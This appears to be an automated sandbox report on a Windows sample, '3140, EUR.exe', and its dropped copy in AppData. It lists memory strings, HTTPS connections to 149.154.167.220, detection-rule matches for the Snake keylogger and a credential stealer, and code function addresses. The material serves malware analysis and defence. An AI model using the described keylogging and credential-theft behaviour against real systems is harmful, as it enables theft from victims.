                    Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076446080_2_07644608
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076436D00_2_076436D0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076400400_2_07640040
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07640F280_2_07640F28
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076479180_2_07647918
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764E7500_2_0764E750
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076436C00_2_076436C0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076445F90_2_076445F9
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076434C00_2_076434C0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076434B10_2_076434B1
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076453780_2_07645378
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076453310_2_07645331
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076453880_2_07645388
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076432600_2_07643260
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076432500_2_07643250
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764C1680_2_0764C168
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764001E0_2_0764001E
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076430C00_2_076430C0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076430B00_2_076430B0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07640F170_2_07640F17
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07641E400_2_07641E40
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07643E400_2_07643E40
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07644E400_2_07644E40
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07641E500_2_07641E50
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07643E500_2_07643E50
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07644E500_2_07644E50
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07643EFB0_2_07643EFB
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764BD300_2_0764BD30
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764DDA00_2_0764DDA0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07641C400_2_07641C40
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07641C500_2_07641C50
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07642A200_2_07642A20
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07642A110_2_07642A11
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764D9680_2_0764D968
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0764D9580_2_0764D958
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076439280_2_07643928
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076479080_2_07647908
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_076439180_2_07643918
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785E0E00_2_0785E0E0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785C4680_2_0785C468
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785C4780_2_0785C478
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785E0C00_2_0785E0C0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785D0C90_2_0785D0C9
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785D0D80_2_0785D0D8
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07854D000_2_07854D00
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_07854CF00_2_07854CF0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785E8380_2_0785E838
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 0_2_0785E8480_2_0785E848
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1D2788_2_02E1D278
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E153628_2_02E15362
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1A0888_2_02E1A088
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1C1478_2_02E1C147
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E171188_2_02E17118
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1C7388_2_02E1C738
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1C4688_2_02E1C468
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1CA088_2_02E1CA08
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E169A08_2_02E169A0
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1E9888_2_02E1E988
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1CFA98_2_02E1CFA9
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1CCD88_2_02E1CCD8
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1F9798_2_02E1F979
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E1E97A8_2_02E1E97A
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 8_2_02E13E098_2_02E13E09
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_04FF00409_2_04FF0040
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_04FF001C9_2_04FF001C
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_04FF33779_2_04FF3377
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076346089_2_07634608
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076336D09_2_076336D0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076300409_2_07630040
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07630F289_2_07630F28
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763E7509_2_0763E750
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076336C09_2_076336C0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076345F99_2_076345F9
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076334C09_2_076334C0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076334B19_2_076334B1
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076353789_2_07635378
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076353319_2_07635331
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076353889_2_07635388
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076332609_2_07633260
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076332509_2_07633250
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763C1689_2_0763C168
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076300079_2_07630007
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076330C09_2_076330C0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076330B09_2_076330B0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07630F179_2_07630F17
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07631E409_2_07631E40
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07633E409_2_07633E40
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07634E409_2_07634E40
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07631E509_2_07631E50
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07633E509_2_07633E50
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07634E509_2_07634E50
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07633EFB9_2_07633EFB
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BD309_2_0763BD30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763BD199_2_0763BD19
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763DDA09_2_0763DDA0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07631C409_2_07631C40
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07631C509_2_07631C50
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07632A209_2_07632A20
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_07632A119_2_07632A11
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763D9679_2_0763D967
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_0763D9689_2_0763D968
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076339289_2_07633928
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 9_2_076339189_2_07633918
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_016EC2E915_2_016EC2E9
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_016E27B415_2_016E27B4
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EC46C15_2_056EC46C
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EC73815_2_056EC738
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EC14715_2_056EC147
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E711815_2_056E7118
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EA08815_2_056EA088
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E536215_2_056E5362
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056ED27815_2_056ED278
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056ECCD815_2_056ECCD8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056ECFAB15_2_056ECFAB
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E69A015_2_056E69A0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EE98815_2_056EE988
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056ECA0815_2_056ECA08
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E3E0915_2_056E3E09
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EE97B15_2_056EE97B
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056EF97915_2_056EF979
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E29EC15_2_056E29EC
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_056E3AA115_2_056E3AA1
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F21E8015_2_06F21E80
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F217A015_2_06F217A0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F20B3015_2_06F20B30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F29C7015_2_06F29C70
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2FC6815_2_06F2FC68
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2502815_2_06F25028
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2296815_2_06F22968
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2954815_2_06F29548
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2E6B015_2_06F2E6B0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2E6AF15_2_06F2E6AF
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F21E7015_2_06F21E70
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2E25815_2_06F2E258
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2E24915_2_06F2E249
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2DE0015_2_06F2DE00
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F29BFA15_2_06F29BFA
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2F3B815_2_06F2F3B8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F28BA015_2_06F28BA0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2F3A815_2_06F2F3A8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F28B9115_2_06F28B91
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2178F15_2_06F2178F
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2EF6015_2_06F2EF60
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2EF5115_2_06F2EF51
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F20B2015_2_06F20B20
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2932815_2_06F29328
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2EB0815_2_06F2EB08
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2D0F815_2_06F2D0F8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2CCA015_2_06F2CCA0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2CC8F15_2_06F2CC8F
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2004015_2_06F20040
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2F81015_2_06F2F810
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2501815_2_06F25018
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2F80115_2_06F2F801
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2000615_2_06F20006
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2DDFF15_2_06F2DDFF
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2D9A815_2_06F2D9A8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2D99915_2_06F2D999
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2D55015_2_06F2D550
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 15_2_06F2D54515_2_06F2D545
